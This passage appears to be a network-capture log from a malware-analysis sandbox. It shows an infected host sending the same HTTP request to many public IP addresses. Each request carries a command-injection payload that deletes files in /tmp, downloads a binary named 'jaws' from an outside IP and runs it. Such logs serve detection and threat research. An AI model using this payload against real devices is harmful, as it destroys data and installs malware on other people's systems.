                            Jun 10, 2024 15:38:02.197002888 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            516192.168.2.134596697.242.25.16080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.197578907 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            517192.168.2.1358564111.183.120.080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.199023008 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            518192.168.2.1341896211.186.230.20580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.200092077 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            519192.168.2.135520639.154.202.11580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.200766087 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            520192.168.2.1341832122.154.206.7580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.201308012 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            521192.168.2.1353342103.245.46.20580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.201891899 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            522192.168.2.134744296.134.106.5380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.202496052 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            523192.168.2.135287251.110.96.20680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.203124046 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            524192.168.2.1355756105.96.207.14480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.203855991 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            525192.168.2.1337872130.15.10.16980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.204471111 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            526192.168.2.134261286.184.181.18580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.205082893 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            527192.168.2.1348150174.173.190.24980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.205682039 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            528192.168.2.1357210117.51.17.16480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.206270933 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            529192.168.2.1344322212.209.139.23480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.206840992 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            530192.168.2.1347142207.200.77.2080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.207442045 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            531192.168.2.134438444.130.63.9280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.208033085 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            532192.168.2.133373860.238.166.8080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.208622932 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            533192.168.2.1339220108.217.14.7380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.209223986 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            534192.168.2.134061482.111.112.23780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.209868908 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            535192.168.2.1360628213.195.115.280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.210410118 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            536192.168.2.133612296.64.204.16280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.211759090 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            537192.168.2.134100492.205.159.25480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.213752985 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            538192.168.2.133539276.65.135.24980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.214504957 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            539192.168.2.133691670.93.199.1580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.215181112 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            540192.168.2.1335478118.231.106.10680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.215873957 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            541192.168.2.135138675.235.225.3080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.216669083 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            542192.168.2.1336550124.237.240.23580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.217346907 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            543192.168.2.134120420.87.200.18480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.217968941 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            544192.168.2.1347496147.24.1.11980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.218756914 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            545192.168.2.1333066109.50.38.17380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.219305038 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            546192.168.2.1344608159.234.223.6480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.220011950 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            547192.168.2.1357864110.93.10.14980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.220674992 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            548192.168.2.1350200176.61.110.2880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.221501112 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            549192.168.2.135540288.20.26.10780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.222619057 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            550192.168.2.134371612.140.219.7880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.223515034 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            551192.168.2.134152480.48.225.20580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.224313021 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            552192.168.2.1351454202.253.242.16980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.225181103 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            553192.168.2.135505077.78.60.24380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.225841045 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            554192.168.2.1354626134.253.9.17780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.226488113 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            555192.168.2.134560482.198.125.20780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.227236986 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            556192.168.2.1349684194.172.51.15580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.227858067 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            557192.168.2.134820882.151.58.14080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.228512049 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            558192.168.2.135611853.171.149.24780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.229242086 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            559192.168.2.135656612.118.28.9280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.229897022 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            560192.168.2.134236213.177.39.9080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.230505943 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            561192.168.2.1341688161.82.119.21880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.231111050 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            562192.168.2.134342846.84.188.5380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.231760025 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            563192.168.2.1337170163.245.107.15680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.233253002 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            564192.168.2.1360900164.62.170.4880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.233908892 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            565192.168.2.1333624169.200.159.2880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.234846115 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            566192.168.2.135612232.84.255.18780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.236058950 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            567192.168.2.1358072210.226.139.8280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.236761093 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            568192.168.2.1340702146.240.196.22180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.237504005 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            569192.168.2.1351116204.127.150.8780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.238178968 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            570192.168.2.1346862206.64.82.15680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.238893032 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            571192.168.2.134801070.237.38.16180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.239619017 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            572192.168.2.1338658140.7.159.13280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.240412951 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            573192.168.2.1355470223.191.85.16980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.241022110 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            574192.168.2.135028278.97.49.1380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.241704941 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            575192.168.2.1353060172.164.171.6580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.242403030 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            576192.168.2.135670619.71.2.18280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.243843079 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            577192.168.2.135522663.62.53.19780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.244589090 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
